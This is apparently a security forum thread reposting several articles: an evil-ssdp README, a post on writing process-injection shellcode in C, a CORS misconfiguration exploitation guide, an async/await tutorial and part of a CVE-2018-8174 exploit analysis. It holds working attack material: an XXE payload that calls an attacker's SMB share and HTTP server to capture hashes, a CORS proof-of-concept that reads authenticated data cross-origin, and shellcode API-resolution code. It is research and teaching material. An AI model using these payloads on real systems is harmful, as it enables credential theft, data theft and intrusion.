By default, this tool essentially forces devices on the network to parse an XML file. A well-known attack against applications that parse XML exists - XML External Entity Processing (XXE). This type of attack against UPNP devices is likely overlooked - simply because the attack method is complex and not readily apparent. However, evilSSDP makes it very easy to test for vulnerable devices on your network. Simply run the tool and look for a big [XXE VULN!!!] in the output. NOTE: using the xxe template will likely not spawn visible evil devices across the LAN; it is meant only for zero-interaction scenarios. This is accomplished by providing a Device Descriptor XML file with the following content:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>

When a vulnerable XML parser reads this file, it will automatically mount the SMB share (allowing you to crack the hash or relay) as well as access an HTTP URL to notify you it was discovered. The notification will contain the HTTP headers and an IP address, which should give you some info on the vulnerable application. If you see this, please do contact the vendor to fix the issue. Also, I would love to hear about any zero days you find using the tool.

Customization

This is an early beta, but it is constructed in such a way as to allow easy template creation in the future. I've included two very basic templates - simply duplicate a template folder and customize it for your own use. Then use the '-t' parameter to choose your new template. The tool currently only correctly creates devices for the UPNP 'rootdevice' device type, although it is responding to the SSDP queries for all device types. If you know UPNP well, you can create a new template with the correct parameters to fulfill requests for other device types as well.

Thanks

Thanks to ZeWarren and his project here. I used this extensively to understand how to get the basics for SSDP working. Also thanks to Microsoft for developing lots of fun insecure things to play with.

Sursa: https://gitlab.com/initstring/evil-ssdp
  21. Process Injection: Writing the payload Posted on July 12, 2018 by odzhan Introduction The purpose of this post is to discuss a Position Independent Code (PIC) written in C that will be used for demonstrating process injection on the Windows operating system. The payload will simply execute an instance of the calculator, and is not intended to be malicious in any way. In follow up posts, I’ll discuss a number of injection methods to help the reader understand how they work. Below is a screenshot of the PROPagate method in action, that I’ll hopefully discuss in a follow up post. Function prototypes Most of the injection methods require a PIC to run successfully in a remote process space, unless of course one wants to load a Dynamic-link Library. (DLL) In the case of loading a DLL, one only needs to execute the LoadLibrary API providing the path of a DLL as parameter. Traditionally, PICs have been written in C or assembly, but there are problems when using pure assembly code. Consider that Windows can run on multiple architectures (e.g x86,amd64,arm), with multiple calling conventions (e.g stdcall,fastcall). What if corrections or changes to the code are required? For those reasons, it makes more sense to use a High-level Language (HLL) like C. Some of the methods that will be discussed have individual requirements. Some of the callback functions executed will be passed a number of parameters, and due to calling convention will expect those parameters be removed upon returning to the caller. Thread procedure Creating a new thread in a remote process can be performed using one of the following API. CreateRemoteThread RtlCreateUserThread NtCreateThreadEx ZwCreateThreadEx Each API expects a pointer to a ThreadProc callback function. The following is defined in the Windows SDK. This is also perfect for LoadLibrary that only expects one parameter. DWORD WINAPI ThreadProc( _In_ LPVOID lpParameter); Asynchronous Procedure Call It’s also possible to attach a PIC to an existing thread by using one of the following API. The thread must be alertable for this to work, and there’s no convenient way to determine if a thread is alertable or not. QueueUserAPC NtQueueApcThread NtQueueApcThreadEx ZwQueueApcThread ZwQueueApcThreadEx RtlQueueApcWow64Thread VOID CALLBACK APCProc( _In_ ULONG_PTR dwParam); WindowProc callback function Some of you will know of the Extra Window Memory (EWM) injection method? The well-known method involves replacing the “CTray” object that is used to control the behavior of the “Shell_TrayWnd” class registered by explorer.exe. Some versions of Windows permit updating this object via SetWindowLongPtr, therefore allowing code execution without the creation of a new thread, but more on that later! The following API can be used to update the window’s callback function. SetWindowLong (32-bit) GetWindowLong (32-bit) SetWindowLongPtr (32 and 64-bit) GetWindowLongPtr (32 and 64-bit) LRESULT CALLBACK WindowProc( _In_ HWND hwnd, _In_ UINT uMsg, _In_ WPARAM wParam, _In_ LPARAM lParam); Subclass callback function The PROPagate method, is named after the APIs GetProp and SetProp used to change the address of a callback function for a subclassed window. As of July 2018, this is a relatively new technique that’s similar to the EWM injection or shatter attacks described in 2002. The following API (but not all) may be of interest. 
GetProp SetProp EnumProps typedef LRESULT ( CALLBACK *SUBCLASSPROC)( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam, UINT_PTR uIdSubclass, DWORD_PTR dwRefData); Dynamic-link Library (DLL) Although not a PIC, process injection can sometimes involve loading a DLL. Compiling the payload into a DLL is therefore an option. __declspec(dllexport) BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, LPVOID lpvReserved); Compiling To generate the appropriate payload using the correct parameters and return type, we use the define directive. If we need to compile the payload for another function prototype, it would be relatively easy to amend this code. #ifdef XAPC // Asynchronous Procedure Call VOID CALLBACK APCProc(ULONG_PTR dwParam) #endif #ifdef THREAD // Create remote thread DWORD WINAPI ThreadProc(LPVOID lpParameter) #endif #ifdef SUBCLASS // Window subclass callback procedure LRESULT CALLBACK SubclassProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam, UINT_PTR uIdSubclass, DWORD_PTR dwRefData) #endif #ifdef WINDOW // Window callback procedure LRESULT CALLBACK WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) #endif #ifdef DLL // compile as Dynamic-link Library #pragma warning( push ) #pragma warning( disable : 4100 ) __declspec(dllexport) BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, LPVOID lpvReserved) #endif What if the payload is called multiple times? For each method discussed, I will address that question. Declaring strings If you declare a string in C, and compile the source into an executable, you might find string literals stored in a read-only section of memory. This is a problem for a PIC because we need all variables, including strings stored on the stack. To illustrate the problem, consider the following simple piece of code. #include <stdio.h> int main(void){ char msg[]="Hello, World!\n"; printf("%s", msg); return 0; } Although this assembly output of the MSVC compiler isn’t very readable, it shows the stack isn’t used for local storage of the string literal. The solution might be declaring the string as a byte array, like the following. #include <stdio.h> int main(void){ char msg[]={'H','e','l','l','o',',',' ','W','o','r','l','d','!','\n',0}; printf("%s", msg); return 0; } The assembly output of this shows MSVC will use the local stack. This works for MSVC, but unfortunately not for GCC that will still store the string in read-only section of the executable. What other options are there? Use inline assembly If I recall correctly, it was Z0MBiE/29a who once suggested in Solving Plain Strings Problem In HLL using macro based assembly with the Borland C compiler to store strings on the stack for the purpose of obfuscation. In Phrack #69, Shellcode the better way, or how to just use your compiler by fishstiqz suggests using an inline macro. #define INLINE_STR(name, str) \ const char * name; \ asm( \ "call 1f\n" \ ".asciz \"" str "\"\n" \ "1:\n" \ "pop %0\n" \ : "=r" (name) \ ); The macro can be used with the following. INLINE_STR(kernel32, "kernel32"); PVOID pKernel32 = scGetModuleBase(kernel32); We’re depending on assembly code here, and that’s precisely what we should avoid. We also can’t inline 64-bit assembly, as fishstiqz points out. What else? Declaration using arrays After examining various options, and having taken the advice of others (@solardiz) declaring strings as 32-bit arrays solves the problem for both GCC and MSVC. 
#include <stdio.h> typedef unsigned int W; int main(void){ W msg[4]; msg[0]=*(W*)"Hell"; msg[1]=*(W*)"o, W"; msg[2]=*(W*)"orld"; msg[3]=*(W*)"!\n"; printf("%s", (char*)msg); return 0; } As you can see from MSVC and GCC output, both place the string on the stack. MSVC output GCC output Of course, it would make sense to automate this process, rather than try initialize manually 😉 Declaring function pointers You don’t have to declare function pointers in this way, but for a shellcode, it makes the code much easier to read. typedef HANDLE (WINAPI *OpenEvent_t)( _In_ DWORD dwDesiredAccess, _In_ BOOL bInheritHandle, _In_ LPCTSTR lpName); typedef BOOL (WINAPI *SetEvent_t)( _In_ HANDLE hEvent); typedef BOOL (WINAPI *CloseHandle_t)( _In_ HANDLE hOject); typedef UINT (WINAPI *WinExec_t)( _In_ LPCSTR lpCmdLine, _In_ UINT uCmdShow); Once the function is defined, you can declare it inside the main code, like so. SetEvent_t pSetEvent; OpenEvent_t pOpenEvent; CloseHandle_t pCloseHandle; WinExec_t pWinExec; Resolving API addresses Rather than cover the same ground, I recommend reading two posts about this task. Resolving API addresses in memory, and Fido, how it resolves GetProcAddress and LoadLibraryA. These both cover some good ways to resolve API dynamically using the Import Address Table (IAT) and Export Address Tables (EAT) of a Portable Executable (PE) file. Traversing the Process Environment Block (PEB) modules is commonly found in shellcodes, and it’s required for a PIC to resolve address of API functions. // search all modules in the PEB for API LPVOID xGetProcAddress(LPVOID pszAPI) { PPEB peb; PPEB_LDR_DATA ldr; PLDR_DATA_TABLE_ENTRY dte; LPVOID api_adr=NULL; #if defined(_WIN64) peb = (PPEB) __readgsqword(0x60); #else peb = (PPEB) __readfsdword(0x30); #endif ldr = (PPEB_LDR_DATA)peb->Ldr; // for each DLL loaded dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink; for (;dte->DllBase != NULL && api_adr == NULL; dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink) { // search the export table for api api_adr=FindExport(dte->DllBase, (PCHAR)pszAPI); } return api_adr; } Searching the Export Address Table (EAT) One can certainly search the Import Address Table (IAT) for the address of API, but the following uses the Export Addres Table. This function doesn’t handle forward references. Note that we’re also searching by string, instead of hash. 
// locate address of API in export address table LPVOID FindExport(LPVOID base, PCHAR pszAPI){ PIMAGE_DOS_HEADER dos; PIMAGE_NT_HEADERS nt; DWORD cnt, rva, dll_h; PIMAGE_DATA_DIRECTORY dir; PIMAGE_EXPORT_DIRECTORY exp; PDWORD adr; PDWORD sym; PWORD ord; PCHAR api, dll; LPVOID api_adr=NULL; dos = (PIMAGE_DOS_HEADER)base; nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew); dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory; rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; // if no export table, return NULL if (rva==0) return NULL; exp = (PIMAGE_EXPORT_DIRECTORY) RVA2VA(ULONG_PTR, base, rva); cnt = exp->NumberOfNames; // if no api names, return NULL if (cnt==0) return NULL; adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions); sym = RVA2VA(PDWORD,base, exp->AddressOfNames); ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals); dll = RVA2VA(PCHAR, base, exp->Name); do { // calculate hash of api string api = RVA2VA(PCHAR, base, sym[cnt-1]); // add to DLL hash and compare if (!xstrcmp(pszAPI, api)){ // return address of function api_adr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]); return api_adr; } } while (--cnt && api_adr==0); return api_adr; } Summary If we use C instead of assembly, writing a payload isn’t that difficult. The next posts on this subject will cover some injection methods individually. I’ll post source code shortly. Sursa: https://modexp.wordpress.com/2018/07/12/process-injection-writing-payload/
  22. Advanced CORS Exploitation Techniques Posted by Corben Leo on June 16, 2018

Preface

I've seen some fantastic research done by Linus Särud and by Bo0oM on how Safari's handling of special characters could be abused. https://labs.detectify.com/2018/04/04/host-headers-safari/ https://lab.wallarm.com/the-good-the-bad-and-the-ugly-of-safari-in-client-side-attacks-56d0cb61275a Both articles dive into practical scenarios where Safari's behavior can lead to XSS or Cookie Injection. The goal of this post is to bring even more creativity and options to the table!

Introduction:

Last November, I wrote about a tricky cross-origin resource sharing bypass in Yahoo View that abused Safari's handling of special characters. Since then, I've found more bugs using clever bypasses and decided to present more advanced techniques to be used. Note: This assumes you have a basic understanding of what CORS is and how to exploit misconfigurations. Here are some awesome posts to get you caught up: Portswigger's Post Geekboy's post

Background: DNS & Browsers:

Quick Summary: The Domain Name System is essentially an address book for servers. It translates/maps hostnames to IP addresses, making the internet easier to use. When you enter a URL into a browser: a DNS lookup is performed to convert the host to an IP address ⇾ the browser initiates a TCP connection to the server ⇾ the server responds with SYN+ACK ⇾ the browser sends an HTTP request to the server to retrieve content ⇾ then renders / displays the content accordingly. If you're a visual thinker, here is an image of the process. DNS servers respond to arbitrary requests – you can send any characters in a subdomain and it'll respond as long as the domain has a wildcard DNS record. Example:

dig A "<@$&(#+_\`^%~>.withgoogle.com" @1.1.1.1 | grep -A 1 "ANSWER SECTION"

Browsers? So we know DNS servers respond to these requests, but how do browsers handle them? Answer: Most browsers validate domain names before making any requests. Examples (Chrome, Firefox, Safari): Notice how I said most browsers validate domain names; not all of them do. Safari is the exception: if we attempt to load the same domain, it will actually send the request and load the page. We can use all sorts of different characters, even unprintable ones:

,&'";!$^*()+=`~-_=|{}%
// non printable chars
%01-08,%0b,%0c,%0e,%0f,%10-%1f,%7f

Jumping into CORS Configurations

Most CORS integrations contain a whitelist of origins that are permitted to read information from an endpoint. This is usually done by using regular expressions.

Example #1: ^https?:\/\/(.*\.)?xxe\.sh$

Intent: The intent of implementing a configuration with this regex would be to allow cross-domain access from xxe.sh and any subdomain (http:// or https://). The only way an attacker would be able to steal data from this endpoint is if they had either an XSS or a subdomain takeover on http(s)://xxe.sh / http(s)://*.xxe.sh.

Example #2: ^https?:\/\/.*\.?xxe\.sh$

Intent: Same as Example #1 – allow cross-domain access from xxe.sh and any subdomain. This regular expression is quite similar to the first example; however, it contains a problem that makes the configuration vulnerable to data theft. The problem lies in the following regex: .*\.? Breakdown:
.* = any characters except for line terminators
\. = a period
? = a quantifier, in this case matches "." either zero or one times.
Since .*\. is not in a capturing group (like in the first example), the ? quantifier only affects the "." character, so any characters are allowed before the string "xxe.sh", regardless of whether there is a period separating them.
This means an attacker could send any origin ending in xxe.sh and would have cross-domain access. This is a pretty common bypass technique – here's a real example of it: https://hackerone.com/reports/168574 by James Kettle

Example #3: ^https?:\/\/(.*\.)?xxe\.sh\:?.*

Intent: This would likely be implemented with the intent to allow cross-domain access from xxe.sh, all subdomains, and any ports on those domains. Can you spot the problem? Breakdown:
\: = Matches the literal character ":"
? = a quantifier, in this case matches ":" either zero or one times.
.* = any characters except for line terminators
Just like in the second example, the ? quantifier only affects the : character. So if we send an origin with other characters after xxe.sh, it will still be accepted.

The Million Dollar Question: How does Safari's handling of special characters come into play when exploiting CORS misconfigurations? Take the following Apache configuration for example:

SetEnvIf Origin "^https?:\/\/(.*\.)?xxe.sh([^\.\-a-zA-Z0-9]+.*)?" AccessControlAllowOrigin=$0
Header set Access-Control-Allow-Origin %{AccessControlAllowOrigin}e env=AccessControlAllowOrigin

This would likely be implemented with the intent of allowing cross-domain access from xxe.sh, all subdomains, and any ports on those domains. Here's a breakdown of the regular expression:
[^\.\-a-zA-Z0-9] = does not match these characters: "." "-" "a-z" "A-Z" "0-9"
+ = a quantifier, matches the above chars one or unlimited times (greedy)
.* = any character(s) except for line terminators
This API won't give access to domains like the ones in the previous examples, and other common bypass techniques won't work. A subdomain takeover or an XSS on *.xxe.sh would allow an attacker to steal data, but let's get more creative! We know that any origin of the form *.xxe.sh followed by the characters . - a-z A-Z 0-9 won't be trusted. What about an origin with a space after the string "xxe.sh"? We see that it's trusted; however, such a domain isn't supported in any normal browser. Since the regex only excludes alphanumeric ASCII characters and ". -" from following "xxe.sh", origins with special characters after "xxe.sh" would be trusted. Such a domain would be supported in a modern, common browser: Safari.

Exploitation:

Pre-Requisites:
A domain with a wildcard DNS record pointing it to your box.
NodeJS
Like most browsers, Apache and Nginx (right out of the box) also don't like these special characters, so it's much easier to serve HTML and Javascript with NodeJS.
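Before building the PoC pages, it is worth sanity-checking the regular expressions themselves. Below is a quick, hedged Python illustration of the bypasses discussed above (the patterns are adapted from the examples in this post, with $ anchors added so that fullmatch behaves like a strict whole-origin check):

import re

# Example #2: the "?" only applies to the "." right before it
example2 = re.compile(r"^https?:\/\/.*\.?xxe\.sh$")
print(bool(example2.match("https://attacker-xxe.sh")))        # True - no dot required before xxe.sh

# Example #3: the "?" only applies to the ":", and ".*" accepts anything after xxe.sh
example3 = re.compile(r"^https?:\/\/(.*\.)?xxe\.sh\:?.*$")
print(bool(example3.match("https://xxe.sh.attacker.net")))    # True

# Apache-style pattern: ". - a-z A-Z 0-9" may not follow xxe.sh...
apache = re.compile(r"^https?:\/\/(.*\.)?xxe\.sh([^\.\-a-zA-Z0-9]+.*)?$")
print(bool(apache.fullmatch("https://xxe.sh.attacker.net")))  # False - "." is excluded
# ...but a special character such as "{" slips through, and Safari will send such an Origin
print(bool(apache.fullmatch("https://xxe.sh{.attacker.net"))) # True

With that confirmed, the Node server below serves the proof-of-concept page.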
[+] serve.js var http = require('http'); var url = require('url'); var fs = require('fs'); var port = 80 http.createServer(function(req, res) { if (req.url == '/cors-poc') { fs.readFile('cors.html', function(err, data) { res.writeHead(200, {'Content-Type':'text/html'}); res.write(data); res.end(); }); } else { res.writeHead(200, {'Content-Type':'text/html'}); res.write('never gonna give you up...'); res.end(); } }).listen(port, '0.0.0.0'); console.log(`Serving on port ${port}`); In the same directory, save the following: [+] cors.html <!DOCTYPE html> <html> <head><title>CORS</title></head> <body onload="cors();"> <center> cors proof-of-concept:<br><br> <textarea rows="10" cols="60" id="pwnz"> </textarea><br> </div> <script> function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("pwnz").innerHTML = this.responseText; } }; xhttp.open("GET", "http://x.xxe.sh/api/secret-data/", true); xhttp.withCredentials = true; xhttp.send(); } </script> Start the NodeJS server by running the following command: node serve.js & Like stated before, since the regular expression matches against alphanumeric ASCII characters and . -, special characters after “xxe.sh” would be trusted: So if we open Safari and visit http://x.xxe.sh{.<your-domain>/cors-poc, we will see that we were able to successfully steal data from the vulnerable endpoint. Edit: It was brought to my attention that the _ character (in subdomains) is not only supported in Safari, but also in Chrome and Firefox! Therefore http://x.xxe.sh_.<your-domain>/cors-poc would send valid origin from the most common browsers! Thanks Prakash, you rock! Practical Testing With these special characters now in mind, figuring out which Origins are reflected in the Access-Control-Allow-Origin header can be a tedious, time-consuming task: Introducing TheftFuzzer: To save time and to become more efficient, I decided to code a tool to fuzz CORS configurations for allowed origins. It’s written in Python and it generates a bunch of different permutations for possible CORS bypasses. It can be found on my Github here. If you have any ideas for improvements to the tool, feel free to ping me or make a pull request! Outro I hope this post has been informative and that you’ve learned from it! Go exploit those CORS configurations and earn some bounties 😝 Happy Hunting! Corben Leo https://twitter.com/hacker_ https://hackerone.com/cdl https://bugcrowd.com/c https://github.com/sxcurity Sursa: https://www.sxcurity.pro/advanced-cors-techniques/
  23. JavaScript async/await: The Good Part, Pitfalls and How to Use

The async/await introduced by ES7 is a fantastic improvement in asynchronous programming with JavaScript. It provides the option of using synchronous-style code to access resources asynchronously, without blocking the main thread. However, it is a bit tricky to use well. In this article we will explore async/await from different perspectives, and will show how to use it correctly and effectively.

The good part in async/await

The most important benefit async/await brought to us is the synchronous programming style. Let's see an example.

// async/await
async getBooksByAuthorWithAwait(authorId) {
  const books = await bookModel.fetchAll();
  return books.filter(b => b.authorId === authorId);
}

// promise
getBooksByAuthorWithPromise(authorId) {
  return bookModel.fetchAll()
    .then(books => books.filter(b => b.authorId === authorId));
}

It is obvious that the async/await version is much easier to understand than the promise version. If you ignore the await keyword, the code just looks like any other synchronous language, such as Python. And the sweet spot is not only readability: async/await has native browser support. As of today, all the mainstream browsers have full support for async functions. (Source: https://caniuse.com/) Native support means you don't have to transpile the code. More importantly, it facilitates debugging. When you set a breakpoint at the function entry point and step over the await line, you will see the debugger pause for a short while while bookModel.fetchAll() does its job, then move to the next .filter line! This is much easier than the promise case, in which you have to set up another breakpoint on the .filter line. (Debugging an async function: the debugger waits at the await line and moves on once the promise resolves.) Another less obvious benefit is the async keyword. It declares that the getBooksByAuthorWithAwait() function return value is guaranteed to be a promise, so that callers can call getBooksByAuthorWithAwait().then(...) or await getBooksByAuthorWithAwait() safely. Think about this case (bad practice!):

getBooksByAuthorWithPromise(authorId) {
  if (!authorId) {
    return null;
  }
  return bookModel.fetchAll()
    .then(books => books.filter(b => b.authorId === authorId));
}

In the above code, getBooksByAuthorWithPromise may return a promise (normal case) or a null value (exceptional case), in which case the caller cannot call .then() safely. With the async declaration, this kind of code becomes impossible.

Async/await Could Be Misleading

Some articles compare async/await with Promise and claim it is the next generation in the evolution of JavaScript asynchronous programming, with which I respectfully disagree. Async/await IS an improvement, but it is no more than syntactic sugar, which will not change our programming style completely. Essentially, async functions are still promises. You have to understand promises before you can use async functions correctly, and even worse, most of the time you need to use promises along with async functions. Consider the getBooksByAuthorWithAwait() and getBooksByAuthorWithPromises() functions in the above example. Note that they are not only functionally identical, they also have exactly the same interface! This means getBooksByAuthorWithAwait() will return a promise if you call it directly. Well, this is not necessarily a bad thing.
Only the name await gives people the feeling of "oh great, this can convert asynchronous functions into synchronous functions", which is actually wrong.

Async/await Pitfalls

So what mistakes may be made when using async/await? Here are some common ones.

Too Sequential

Although await can make your code look synchronous, keep in mind that it is still asynchronous and care must be taken to avoid being too sequential.

async getBooksAndAuthor(authorId) {
  const books = await bookModel.fetchAll();
  const author = await authorModel.fetch(authorId);
  return {
    author,
    books: books.filter(book => book.authorId === authorId),
  };
}

This code looks logically correct. However, this is wrong. await bookModel.fetchAll() will wait until fetchAll() returns. Then await authorModel.fetch(authorId) will be called. Notice that authorModel.fetch(authorId) does not depend on the result of bookModel.fetchAll(), and in fact they can be called in parallel! However, by using await here these two calls become sequential, and the total execution time will be much longer than the parallel version. Here is the correct way:

async getBooksAndAuthor(authorId) {
  const bookPromise = bookModel.fetchAll();
  const authorPromise = authorModel.fetch(authorId);
  const books = await bookPromise;
  const author = await authorPromise;
  return {
    author,
    books: books.filter(book => book.authorId === authorId),
  };
}

Or even worse, if you want to fetch a list of items one by one, you have to rely on promises:

async getAuthors(authorIds) {
  // WRONG, this will cause sequential calls
  // const authors = _.map(
  //   authorIds,
  //   id => await authorModel.fetch(id));

  // CORRECT
  const promises = _.map(authorIds, id => authorModel.fetch(id));
  const authors = await Promise.all(promises);
  return authors;
}

In short, you still need to think about the workflows asynchronously, then try to write the code synchronously with await. In complicated workflows it might be easier to use promises directly.

Error Handling

With promises, an async function has two possible outcomes: a resolved value and a rejected value. We can use .then() for the normal case and .catch() for the exceptional case. However, with async/await, error handling can be tricky.

try…catch

The most standard (and the one I recommend) way is to use a try...catch statement. When you await a call, any rejected value will be thrown as an exception. Here is an example:

class BookModel {
  fetchAll() {
    return new Promise((resolve, reject) => {
      window.setTimeout(() => { reject({'error': 400}) }, 1000);
    });
  }
}

// async/await
async getBooksByAuthorWithAwait(authorId) {
  try {
    const books = await bookModel.fetchAll();
  } catch (error) {
    console.log(error);    // { "error": 400 }
  }
}

The caught error is exactly the rejected value. After we catch the exception, we have several ways to deal with it:
Handle the exception, and return a normal value. (Not using any return statement in the catch block is equivalent to using return undefined;, which is a normal value as well.)
Throw it, if you want the caller to handle it. You can either throw the plain error object directly, like throw error;, which allows you to use this async getBooksByAuthorWithAwait() function in a promise chain (i.e. you can still call it like getBooksByAuthorWithAwait().then(...).catch(error => ...)); or you can wrap the error in an Error object, like throw new Error(error), which will give the full stack trace when this error is displayed in the console.
Reject it, like return Promise.reject(error). This is equivalent to throw error, so it is not recommended.
The benefits of using try...catch are: It is simple and traditional; as long as you have experience with other languages such as Java or C++, you won't have any difficulty understanding it. You can also wrap multiple await calls in a single try...catch block to handle errors in one place, if per-step error handling is not necessary. There is also one flaw in this approach. Since try...catch will catch every exception in the block, some exceptions that are not usually caught by promises will be caught too. Think about this example:

class BookModel {
  fetchAll() {
    cb();    // note `cb` is undefined and will result in an exception
    return fetch('/books');
  }
}

try {
  bookModel.fetchAll();
} catch(error) {
  console.log(error);    // This will print "cb is not defined"
}

Run this code and you will get an error, ReferenceError: cb is not defined, in the console, printed in black. The error was output by console.log(), not by JavaScript itself. Sometimes this can be fatal: if BookModel is enclosed deeply in a series of function calls and one of the calls swallows the error, then it will be extremely hard to find an undefined error like this.

Making functions return both values

Another approach to error handling is inspired by the Go language. It allows an async function to return both the error and the result. See this blog post for the details: How to write async await without try-catch blocks in Javascript (blog.grossman.io). In short, you can use an async function like this:

[err, user] = await to(UserModel.findById(1));

Personally I don't like this approach, since it brings Go style into JavaScript, which feels unnatural, but in some cases it might be quite useful.

Using .catch

The final approach we will introduce here is to continue using .catch(). Recall the functionality of await: it will wait for a promise to complete its job. Also recall that promise.catch() will return a promise too! So we can write error handling like this:

// books === undefined if an error happens,
// since nothing is returned in the catch statement
let books = await bookModel.fetchAll()
  .catch((error) => { console.log(error); });

There are two minor issues in this approach: It is a mixture of promises and async functions, so you still need to understand how promises work to read it. Error handling comes before the normal path, which is not intuitive.

Conclusion

The async/await keywords introduced by ES7 are definitely an improvement to JavaScript asynchronous programming. They can make code easier to read and debug. However, in order to use them correctly, one must completely understand promises, since they are no more than syntactic sugar, and the underlying technique is still promises. I hope this post gives you some ideas about async/await and helps you avoid some common mistakes. Thanks for reading, and please clap for me if you like this post. Charlee Li Full stack engineer & Tech writer @ Toronto.

Sursa: https://hackernoon.com/javascript-async-await-the-good-part-pitfalls-and-how-to-use-9b759ca21cda
  24. Dissecting modern browser exploit: case study of CVE-2018–8174

When this exploit first emerged at the turn of April and May it piqued my interest, since despite heavy obfuscation the code structure seemed well organized and the vulnerability exploitation code was small enough to make analysis simpler. I downloaded the PoC from GitHub and decided it would be a good candidate for taking a look under the hood. At that time two analyses were already published, the first from 360 and the second from Kaspersky. Both of them helped me understand how it worked, but were not enough to deeply understand every aspect of the exploit. That's why I decided to analyze it on my own and share my findings.

Preprocessing

First, in order to remove the integer obfuscation, I used a regex substitution in a Python script. As for the obfuscated names, I renamed them progressively during the analysis. This analysis is best read alongside the source code, a link to which is at the end.

Use after free

The vulnerability occurs when an object is terminated and the custom-defined function Class_Terminate() is called. In this function a reference to the object being freed is saved in UafArray. From now on UafArray(i) refers to the deleted object. Also notice the last line in Class_Terminate(). When we copy the ClassTerminate object to UafArray, its reference counter is increased. To balance it out we free it again by assigning another value to FreedObjectArray. Without this, the object's memory wouldn't be freed despite Class_Terminate being called on it, and the next object wouldn't be allocated in its place. Creating and deleting new objects is repeated 7 times in a loop; after that a new object of class ReuseClass is created. It's allocated in the same memory that was previously occupied by the 7 ClassTerminate instances. To better understand that, here is a simple WinDbg script that tracks all those allocations:

bp vbscript!VBScriptClass::TerminateClass ".printf \"Class %mu at %x, terminate called\\n\", poi(@ecx + 0x24), @ecx; g";
bp vbscript!VBScriptClass::Release ".printf \"Class %mu at: %x ref counter, release called: %d\\n\", poi(@eax + 0x24), @ecx, poi(@eax + 0x4); g";
bp vbscript!VBScriptClass::Create+0x55 ".printf \"Class %mu created at %x\\n\", poi(@esi + 0x24), @esi; g";

Here is the allocation log from the UafTrigger function: Class EmptyClass created at 3a7d90 Class EmptyClass created at 3a7dc8 ... Class ReuseClass created at 22601a0 Class ReuseClass created at 22601d8 Class ReuseClass created at 2260210 ...
Class ClassTerminateA created at 22605c8 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 1 Class ClassTerminateA at 22605c8, terminate called Class ClassTerminateA at: 70541748 ref counter, release called: 5 Class ClassTerminateA at: 70541748 ref counter, release called: 4 Class ClassTerminateA at: 70541748 ref counter, release called: 3 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA created at 22605c8 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 1 Class ClassTerminateA at 22605c8, terminate called Class ClassTerminateA at: 70541748 ref counter, release called: 5 Class ClassTerminateA at: 70541748 ref counter, release called: 4 Class ClassTerminateA at: 70541748 ref counter, release called: 3 Class ClassTerminateA at: 70541748 ref counter, release called: 2 ... Class ReuseClass created at 22605c8 ... Class ClassTerminateB created at 2260600 Class ClassTerminateB at: 70541748 ref counter, release called: 2 Class ClassTerminateB at: 70541748 ref counter, release called: 2 Class ClassTerminateB at: 70541748 ref counter, release called: 2 Class ClassTerminateB at: 70541748 ref counter, release called: 1 Class ClassTerminateB at 2260600, terminate called Class ClassTerminateB at: 70541748 ref counter, release called: 5 Class ClassTerminateB at: 70541748 ref counter, release called: 4 Class ClassTerminateB at: 70541748 ref counter, release called: 3 Class ClassTerminateB at: 70541748 ref counter, release called: 2 ... Class ReuseClass created at 2260600 We can immediately see that ReuseClass is indeed allocated in the same memory that was assigned to 7 previous instances of ClassTerminate This is repeated twice. We end up with two objects referenced by UafArrays. None of those references is reflected in object's reference counter. In this log we can also notice that even after Class_Terminate was called there are some object manipulations that change its reference counter. That's why if we didn't balance this counter out in Class_Terminate we would get something like this: Class ClassTerminateA created at 2240708 Class ClassTerminateA at: 6c161748 ref counter, release called: 2 Class ClassTerminateA at: 6c161748 ref counter, release called: 2 Class ClassTerminateA at: 6c161748 ref counter, release called: 2 Class ClassTerminateA at: 6c161748 ref counter, release called: 1 Class ClassTerminateA at 2240708, terminate called Class ClassTerminateA at: 6c161748 ref counter, release called: 5 Class ClassTerminateA at: 6c161748 ref counter, release called: 4 Class ClassTerminateA at: 6c161748 ref counter, release called: 3 Class ReuseClass created at 2240740 Different allocation addresses. Exploit would fail to create use after free condition. Type Confusion Having created those two objects with 7 uncounted references to each, we established read arbitrary memory primitive. There are two similar classes ReuseClass and FakeReuseClass. By replacing first class with second one a type confusion on mem member occurs. 
